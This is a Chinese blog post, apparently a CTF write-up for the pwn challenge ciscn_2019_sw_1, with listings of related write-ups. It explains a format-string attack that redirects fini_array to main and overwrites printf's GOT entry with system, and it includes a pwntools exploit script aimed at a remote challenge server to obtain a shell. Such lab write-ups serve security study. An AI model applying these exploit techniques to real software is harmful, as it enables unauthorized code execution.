ciscn_2019_sw_1

最新推荐文章于 2023-09-22 15:39:55 发布
最新推荐文章于 2023-09-22 15:39:55 发布
阅读量606 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/105566478
版权

思路

通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址)
我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell
exp:

from pwn import *
#p=process('./ciscn_2019_sw_1')
p=remote('node3.buuoj.cn',25777)
elf=ELF('./ciscn_2019_sw_1')
main=0x08048534
fini=0x0804979C
printf=elf.got['printf']
system=0x80483D0
system_low=system&0xffff
system_height=system>>16
offset=4
#payload=fmtstr_payload(offset,{fini:main},write_size='short')
payload=p32(fini)+p32(printf)+p32(printf+2)+p32(fini+2)
payload+='%'+str(main&0xffff-0x10)+'d%4$hn'+'%'+str(system_low+0x7ad0-4)+'d'+'%5$hn'+'%'+str(0x8434)+'d%6$hn'
p.sendline(payload)
log.success('payload_length: '+str(len(payload)))
p.interactive()
print len(payload)
doudoudedi
关注
专栏目录
ANS.rar_sw ans
09-19
标题中的"ANS.rar_sw ans"可能是指一个名为"ANS"的RAR压缩文件,其中包含了与SW系列开关(可能是数字开关或按钮)相关的解答或解决方案。"sw ans"可能表示这个压缩包内有针对如何操作这些开关,特别是SW3、SW4和SW5...
pwn中的万能gadget函数
Assassin
04-08 680
pwn的过程中,有一些一般程序都有的万能gadget函数,特别时程序在初始化的时候一般会有下面函数,就为构造ROP链提供了原材料 _init _start call_gmon_start deregister_tm_clones register_tm_clones __do_global_dtors_aux frame_dummy __libc_csu_init __libc_csu_fini _fini _dl_runtime_resolve __libc_csu_init .text:000000
php非法指令,RCTF2020部分PWN题解
weixin_29461699的博客
03-26 679
前言上周肝了两天RCTF,最近闲下来好好做了下其中的几道题,这里写一下它们的题解note程序逻辑很典型的菜单题,bss处有个全局变量被设置为0x996,在New的时候会比较0x359 * sz和global_money前者小于等于后者方可进行calloc分配,这里很明显可以通过0x10000000000000000/0x359+1进行绕过,当然,因为这个size过大,calloc分配失败会返回0,...
BUUCTF之“ciscn_2019_sw_1”
Probeginner的博客
12-26 707
通过fmt改fini_array为main,更加深入理解程序执行
ciscn_2019_s_1
z1r0的博客
03-17 738
ciscn_2019_s_1 查看保护 申请的大小在0x7f-0x100之间 key1有限制,还有一个off-by-null key2不为0可以调用show这个函数 攻击思路:edit中有一个off-by-null,key1和key2都被限制了。其实攻击思路还挺明确的,因为heap是一个list,保护没有开pie,所以可以使用unlink来申请地址 1.首先肯定是要填充满tcache的,因为不是tcache的话,unlink不是双链表 2.接着考虑将unlink申请到哪里 在bss段这里可以看到有
SW.rar_soft sw_sw协议
09-22
1. **软交换基本原理**: 软交换的核心是将呼叫控制功能从物理交换设备中分离出来,转移到基于通用处理器的服务器上。这允许通过软件升级来添加新功能,而不是依赖于昂贵的硬件更新。此外,软交换还负责信令处理、...
scsi_dh_hp_sw.rar_If only
09-24
标题中的"scsi_dh_hp_sw.rar_If only"提到了一个名为"scsi_dh_hp_sw"的压缩包文件,后缀为".rar",表明这是一个RAR格式的压缩文件,通常用于存储和分发多个相关文件。"If only"可能是对这个文件的一种情境性描述,...
sw_pres_sw_pres_海洋_
09-29
1. **深度计算**: 首先,该程序可能会根据标准海洋压强公式,即每增加10米深度,压强增加约1大气压(1013.25 hPa),来计算随深度变化的压力。 2. **考虑温度和盐度**: 由于海水的密度受温度和盐度影响,因此精确的...
SW-INT-8051.rar_sw code_sw749
09-24
标题中的"SW-INT-8051.rar"暗示了这是一个关于软件中断处理的资源包,主要用于8051微控制器。"sw code_sw749"表明这是一段C语言编写的软件代码,可能是一个特定编号的项目或库。标签"sw_code"和"sw749"再次确认了这...
Ciscn_2019_sw1<fini_array>
最新发布
m0_55906008的博客
09-22 171
​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。
[BUUCTF-pwn]——ciscn_2019_sw_1
Y_peak的博客
04-03 497
[BUUCTF-pwn]——ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好 可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修改为mian就会循环调用了 算下偏移, 一看就是4 exploit from pwn import * p = remote("no
ciscn_2019_sw_1 Writeup
Calllin的博客
05-11 496
前提 RELRO防御策略是当RELRO保护: 为NO RELRO的时候,init.array、fini.array、got.plt均可读可写 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。 linux程序运行时: 在加载的时候,会依次调用init.array数组中的每一个函数指针 在结束的时候,依次调用fini.array中的每一个函数
ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)
m0_51251108的博客
11-13 590
ciscn_2019_sw_1: 主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9 先引用下: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写; 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写; 为FULL RELRO时,init.array
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1448
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
C语言程序编译阶段浅析
uxlike的博客
09-30 1648
编译一个C程序主要经历4个阶段:预处理、编译、汇编、链接,本文将分别对这四个阶段进行解读。
pwnciscn_2019_final_3
Nothing
12-18 1700
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
Pwnciscn_2019_s_3 wp 解析(bin/sh+0x50)
Lcw_linyx的博客
05-09 1148
本题用到了ret2csu,也可通过srop,重点讲/bin/sh+0x50
SIMATIC SPC3_SW_D11: PROFIBUS Controller Software Description
spc3_sw_d11是一个关于Siemens SPC3控制器的软件版本,它在工业自动化环境中提供通信服务,并且通过ComDeC SPC3组件优化了网络配置,减少了布线需求。这个资源对于理解如何使用SPC3和DPS2在PROFIBUS环境中进行有效...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值